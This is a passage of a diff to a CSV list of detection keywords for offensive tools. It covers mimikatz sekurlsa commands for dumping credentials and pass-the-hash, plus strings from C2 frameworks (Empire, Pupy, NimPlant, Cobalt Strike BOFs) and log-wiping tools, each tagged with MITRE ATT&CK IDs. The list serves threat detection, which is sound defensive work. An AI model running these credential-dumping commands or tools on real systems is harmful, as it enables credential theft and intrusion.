keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::tspkg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::wdigest*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa *","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts 
passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::bootkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::cloudap*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::credman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapisystem*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ekeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::kerberos*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::krbtgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::livessp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::msv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::process*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::pth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::tickets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::tspkg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::wdigest*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*SELECT * FROM EvilSignature*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*SELECT * FROM EvilSignature*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*SELECT displayName FROM AntiVirusProduct*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*self_delete.x64.o*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*Self_Deletion_BOF*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" -"*-selfdelete.exe -d:selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*-selfdelete.exe -d:selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*SeManageVolumeExploit.*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*SeManageVolumeExploit-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*Semperis/GoldenGMSA*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" "*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" -"*Send the payload with the grooms*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*send_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Send the payload with the grooms*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
